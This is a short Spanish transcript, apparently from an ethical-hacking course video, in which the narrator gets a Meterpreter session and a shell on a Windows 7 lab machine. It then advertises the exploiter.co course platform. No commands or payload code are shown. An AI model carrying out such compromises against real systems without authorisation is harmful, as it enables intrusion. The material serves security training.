Pequeño problemilla de red. Y vamos a esperar un poco que se ejecute todo. Vamos a ver, al parecer partimos conectividad desde aquí. Obviamente no es por el payload, puesto que el payload no toca nada referente a la red. No podría ser que nos desconectamos. Entonces, voy a intentar conectarnos a Google. Y listo, aquí ya logramos obtener una shell, Meterpreter Session 1 Opened. Entonces si nosotros llamamos a shell, vamos a obtener una shell dentro de la máquina Windows 7 y la hemos comprometido totalmente. Ya estamos dentro y aquí ya empieza la parte de post-explotación. Si ustedes quieren aprender esto y mucho más, con no solo videos, sino artículos, laboratorios, profesores expertos, respuestas a todas sus preguntas y una plataforma que puede controlar totalmente su progreso y evaluarlos cada vez que aprenden algo nuevo, vayan ya mismo a www.exploiter.co, suscríbanse, empiecen totalmente gratis, o suscríbanse a este curso de Hacking Ético Profesional y al de Hacking con Python, Penetration Testing con Metasploit e Introducción al Hacking por tan solo $25 al mes. Sí, por todos los cursos, no solo por uno, por todos los cursos.